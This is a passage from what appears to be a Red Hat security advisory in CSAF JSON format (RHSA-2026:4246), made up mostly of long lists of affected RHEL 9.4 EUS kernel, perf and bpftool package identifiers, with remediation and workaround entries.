"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"RT-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4246"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"AppStream-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
